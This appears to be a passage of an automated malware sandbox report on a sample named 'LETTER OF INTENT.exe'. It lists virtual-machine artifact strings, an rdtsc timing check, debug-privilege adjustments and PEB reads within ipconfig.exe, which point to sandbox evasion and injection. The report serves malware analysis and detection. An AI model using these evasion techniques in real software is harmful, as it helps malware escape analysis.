            Source: explorer.exe, 00000017.00000003.438430184.0000000007E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}rs\DriverDataHOMEDRIVE=C:B
            Source: explorer.exe, 00000017.00000000.434106783.0000000006442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
            Source: explorer.exe, 00000003.00000000.274729760.000000000DC67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000017.00000003.438430184.0000000007E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BP
            Source: explorer.exe, 00000017.00000000.434106783.0000000006442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
            Source: explorer.exe, 00000017.00000003.438430184.0000000007E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
            Source: explorer.exe, 00000003.00000000.341196844.00000000011B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000003.00000000.272859933.00000000089B5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000003.00000000.249884989.00000000053C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000003.00000000.272859933.00000000089B5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: explorer.exe, 00000017.00000000.434106783.0000000006442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000017.00000003.438430184.0000000007E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x86)=C:\Program Files (x86)BJ
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC2AE4 mov eax, dword ptr fs:[00000030h]15_2_02EC2AE4
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC2ACB mov eax, dword ptr fs:[00000030h]15_2_02EC2ACB
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E952A5 mov eax, dword ptr fs:[00000030h]15_2_02E952A5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E952A5 mov eax, dword ptr fs:[00000030h]15_2_02E952A5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E952A5 mov eax, dword ptr fs:[00000030h]15_2_02E952A5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E952A5 mov eax, dword ptr fs:[00000030h]15_2_02E952A5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E952A5 mov eax, dword ptr fs:[00000030h]15_2_02E952A5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAAAB0 mov eax, dword ptr fs:[00000030h]15_2_02EAAAB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAAAB0 mov eax, dword ptr fs:[00000030h]15_2_02EAAAB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECFAB0 mov eax, dword ptr fs:[00000030h]15_2_02ECFAB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECD294 mov eax, dword ptr fs:[00000030h]15_2_02ECD294
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECD294 mov eax, dword ptr fs:[00000030h]15_2_02ECD294
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F4B260 mov eax, dword ptr fs:[00000030h]15_2_02F4B260
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F4B260 mov eax, dword ptr fs:[00000030h]15_2_02F4B260
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F68A62 mov eax, dword ptr fs:[00000030h]15_2_02F68A62
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED927A mov eax, dword ptr fs:[00000030h]15_2_02ED927A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5EA55 mov eax, dword ptr fs:[00000030h]15_2_02F5EA55
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F24257 mov eax, dword ptr fs:[00000030h]15_2_02F24257
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E99240 mov eax, dword ptr fs:[00000030h]15_2_02E99240
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E99240 mov eax, dword ptr fs:[00000030h]15_2_02E99240
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E99240 mov eax, dword ptr fs:[00000030h]15_2_02E99240
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E99240 mov eax, dword ptr fs:[00000030h]15_2_02E99240
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED4A2C mov eax, dword ptr fs:[00000030h]15_2_02ED4A2C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED4A2C mov eax, dword ptr fs:[00000030h]15_2_02ED4A2C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA8A0A mov eax, dword ptr fs:[00000030h]15_2_02EA8A0A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5AA16 mov eax, dword ptr fs:[00000030h]15_2_02F5AA16
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5AA16 mov eax, dword ptr fs:[00000030h]15_2_02F5AA16
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB3A1C mov eax, dword ptr fs:[00000030h]15_2_02EB3A1C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E95210 mov eax, dword ptr fs:[00000030h]15_2_02E95210
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E95210 mov ecx, dword ptr fs:[00000030h]15_2_02E95210
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E95210 mov eax, dword ptr fs:[00000030h]15_2_02E95210
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E95210 mov eax, dword ptr fs:[00000030h]15_2_02E95210
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9AA16 mov eax, dword ptr fs:[00000030h]15_2_02E9AA16
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9AA16 mov eax, dword ptr fs:[00000030h]15_2_02E9AA16
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBDBE9 mov eax, dword ptr fs:[00000030h]15_2_02EBDBE9
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC03E2 mov eax, dword ptr fs:[00000030h]15_2_02EC03E2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC03E2 mov eax, dword ptr fs:[00000030h]15_2_02EC03E2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC03E2 mov eax, dword ptr fs:[00000030h]15_2_02EC03E2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC03E2 mov eax, dword ptr fs:[00000030h]15_2_02EC03E2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC03E2 mov eax, dword ptr fs:[00000030h]15_2_02EC03E2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC03E2 mov eax, dword ptr fs:[00000030h]15_2_02EC03E2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F153CA mov eax, dword ptr fs:[00000030h]15_2_02F153CA
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F153CA mov eax, dword ptr fs:[00000030h]15_2_02F153CA
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC4BAD mov eax, dword ptr fs:[00000030h]15_2_02EC4BAD
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC4BAD mov eax, dword ptr fs:[00000030h]15_2_02EC4BAD
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC4BAD mov eax, dword ptr fs:[00000030h]15_2_02EC4BAD
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F65BA5 mov eax, dword ptr fs:[00000030h]15_2_02F65BA5
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA1B8F mov eax, dword ptr fs:[00000030h]15_2_02EA1B8F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA1B8F mov eax, dword ptr fs:[00000030h]15_2_02EA1B8F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F4D380 mov ecx, dword ptr fs:[00000030h]15_2_02F4D380
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC2397 mov eax, dword ptr fs:[00000030h]15_2_02EC2397
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECB390 mov eax, dword ptr fs:[00000030h]15_2_02ECB390
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5138A mov eax, dword ptr fs:[00000030h]15_2_02F5138A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9DB60 mov ecx, dword ptr fs:[00000030h]15_2_02E9DB60
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC3B7A mov eax, dword ptr fs:[00000030h]15_2_02EC3B7A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC3B7A mov eax, dword ptr fs:[00000030h]15_2_02EC3B7A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9DB40 mov eax, dword ptr fs:[00000030h]15_2_02E9DB40
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F68B58 mov eax, dword ptr fs:[00000030h]15_2_02F68B58
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9F358 mov eax, dword ptr fs:[00000030h]15_2_02E9F358
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5131B mov eax, dword ptr fs:[00000030h]15_2_02F5131B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E958EC mov eax, dword ptr fs:[00000030h]15_2_02E958EC
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E940E1 mov eax, dword ptr fs:[00000030h]15_2_02E940E1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E940E1 mov eax, dword ptr fs:[00000030h]15_2_02E940E1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E940E1 mov eax, dword ptr fs:[00000030h]15_2_02E940E1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2B8D0 mov eax, dword ptr fs:[00000030h]15_2_02F2B8D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2B8D0 mov ecx, dword ptr fs:[00000030h]15_2_02F2B8D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2B8D0 mov eax, dword ptr fs:[00000030h]15_2_02F2B8D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2B8D0 mov eax, dword ptr fs:[00000030h]15_2_02F2B8D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2B8D0 mov eax, dword ptr fs:[00000030h]15_2_02F2B8D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F2B8D0 mov eax, dword ptr fs:[00000030h]15_2_02F2B8D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED90AF mov eax, dword ptr fs:[00000030h]15_2_02ED90AF
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC20A0 mov eax, dword ptr fs:[00000030h]15_2_02EC20A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC20A0 mov eax, dword ptr fs:[00000030h]15_2_02EC20A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC20A0 mov eax, dword ptr fs:[00000030h]15_2_02EC20A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC20A0 mov eax, dword ptr fs:[00000030h]15_2_02EC20A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC20A0 mov eax, dword ptr fs:[00000030h]15_2_02EC20A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC20A0 mov eax, dword ptr fs:[00000030h]15_2_02EC20A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECF0BF mov ecx, dword ptr fs:[00000030h]15_2_02ECF0BF
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECF0BF mov eax, dword ptr fs:[00000030h]15_2_02ECF0BF
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECF0BF mov eax, dword ptr fs:[00000030h]15_2_02ECF0BF
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E99080 mov eax, dword ptr fs:[00000030h]15_2_02E99080
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F13884 mov eax, dword ptr fs:[00000030h]15_2_02F13884
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F13884 mov eax, dword ptr fs:[00000030h]15_2_02F13884
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F61074 mov eax, dword ptr fs:[00000030h]15_2_02F61074
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F52073 mov eax, dword ptr fs:[00000030h]15_2_02F52073
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB0050 mov eax, dword ptr fs:[00000030h]15_2_02EB0050
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB0050 mov eax, dword ptr fs:[00000030h]15_2_02EB0050
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAB02A mov eax, dword ptr fs:[00000030h]15_2_02EAB02A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAB02A mov eax, dword ptr fs:[00000030h]15_2_02EAB02A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAB02A mov eax, dword ptr fs:[00000030h]15_2_02EAB02A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAB02A mov eax, dword ptr fs:[00000030h]15_2_02EAB02A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC002D mov eax, dword ptr fs:[00000030h]15_2_02EC002D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC002D mov eax, dword ptr fs:[00000030h]15_2_02EC002D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC002D mov eax, dword ptr fs:[00000030h]15_2_02EC002D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC002D mov eax, dword ptr fs:[00000030h]15_2_02EC002D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC002D mov eax, dword ptr fs:[00000030h]15_2_02EC002D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F64015 mov eax, dword ptr fs:[00000030h]15_2_02F64015
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F64015 mov eax, dword ptr fs:[00000030h]15_2_02F64015
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F17016 mov eax, dword ptr fs:[00000030h]15_2_02F17016
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F17016 mov eax, dword ptr fs:[00000030h]15_2_02F17016
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F17016 mov eax, dword ptr fs:[00000030h]15_2_02F17016
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9B1E1 mov eax, dword ptr fs:[00000030h]15_2_02E9B1E1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9B1E1 mov eax, dword ptr fs:[00000030h]15_2_02E9B1E1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9B1E1 mov eax, dword ptr fs:[00000030h]15_2_02E9B1E1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F241E8 mov eax, dword ptr fs:[00000030h]15_2_02F241E8
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC61A0 mov eax, dword ptr fs:[00000030h]15_2_02EC61A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC61A0 mov eax, dword ptr fs:[00000030h]15_2_02EC61A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F151BE mov eax, dword ptr fs:[00000030h]15_2_02F151BE
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F151BE mov eax, dword ptr fs:[00000030h]15_2_02F151BE
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F151BE mov eax, dword ptr fs:[00000030h]15_2_02F151BE
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F151BE mov eax, dword ptr fs:[00000030h]15_2_02F151BE
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F549A4 mov eax, dword ptr fs:[00000030h]15_2_02F549A4
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F549A4 mov eax, dword ptr fs:[00000030h]15_2_02F549A4
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F549A4 mov eax, dword ptr fs:[00000030h]15_2_02F549A4
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F549A4 mov eax, dword ptr fs:[00000030h]15_2_02F549A4
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F169A6 mov eax, dword ptr fs:[00000030h]15_2_02F169A6
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBC182 mov eax, dword ptr fs:[00000030h]15_2_02EBC182
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECA185 mov eax, dword ptr fs:[00000030h]15_2_02ECA185
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC2990 mov eax, dword ptr fs:[00000030h]15_2_02EC2990
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9C962 mov eax, dword ptr fs:[00000030h]15_2_02E9C962
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9B171 mov eax, dword ptr fs:[00000030h]15_2_02E9B171
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9B171 mov eax, dword ptr fs:[00000030h]15_2_02E9B171
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBB944 mov eax, dword ptr fs:[00000030h]15_2_02EBB944
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBB944 mov eax, dword ptr fs:[00000030h]15_2_02EBB944
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB4120 mov eax, dword ptr fs:[00000030h]15_2_02EB4120
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB4120 mov eax, dword ptr fs:[00000030h]15_2_02EB4120
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB4120 mov eax, dword ptr fs:[00000030h]15_2_02EB4120
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB4120 mov eax, dword ptr fs:[00000030h]15_2_02EB4120
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB4120 mov ecx, dword ptr fs:[00000030h]15_2_02EB4120
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC513A mov eax, dword ptr fs:[00000030h]15_2_02EC513A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC513A mov eax, dword ptr fs:[00000030h]15_2_02EC513A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E99100 mov eax, dword ptr fs:[00000030h]15_2_02E99100
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E99100 mov eax, dword ptr fs:[00000030h]15_2_02E99100
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E99100 mov eax, dword ptr fs:[00000030h]15_2_02E99100
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA76E2 mov eax, dword ptr fs:[00000030h]15_2_02EA76E2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC16E0 mov ecx, dword ptr fs:[00000030h]15_2_02EC16E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F68ED6 mov eax, dword ptr fs:[00000030h]15_2_02F68ED6
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC36CC mov eax, dword ptr fs:[00000030h]15_2_02EC36CC
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED8EC7 mov eax, dword ptr fs:[00000030h]15_2_02ED8EC7
